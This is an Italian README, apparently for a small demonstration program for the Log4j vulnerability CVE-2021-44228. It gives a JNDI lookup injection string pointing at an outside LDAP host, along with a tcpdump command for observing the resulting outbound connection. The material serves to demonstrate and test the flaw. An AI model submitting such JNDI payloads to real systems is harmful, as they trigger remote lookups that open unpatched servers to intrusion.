
Un semplice programma per dimostrare come la vulnerabilità Log4j possa essere sfruttata ( CVE-2021-44228 )
Un semplice programma per dimostrare come la vulnerabilità Log4j può essere sfruttata ( CVE-2021-44228 )
Per avviare il programma, basta eseguire start.sh ( su sistemi UNIX ) oppure start.bat su Windows.
L'input dell'utente verrà letto e registrato nella console utilizzando il framework Log4j.
Per impostazione predefinita, i messaggi di log generati dalla libreria Log4j non forniscono errori di server non raggiungibile / host non trovato per le sostituzioni JNDI. ( E immagino che sia anche questo il motivo principale per cui questa vulnerabilità può essere sfruttata in modo furtivo )
Prova anche a usare sottodomini, come ${jndi:ldap://test29.google.com/blah} , a volte la chiamata JNDI attenderà la risposta dal server remoto ed è per questo che il programma sembra bloccato mentre in realtà ha effettuato un tentativo di connessione in background. Se usi sottodomini che non esistono, la chiamata JNDI terminerà rapidamente dopo aver effettuato un tentativo di connessione e il programma continuerà.
Ti consiglio di eseguire il programma in una shell, e di eseguire il comando " tcpdump -i any | grep google " in un'altra shell in parallelo, quindi fornire input al programma per verificare se il programma ha effettuato un tentativo di connessione.



testing ( Stringa Normale )
--
--
--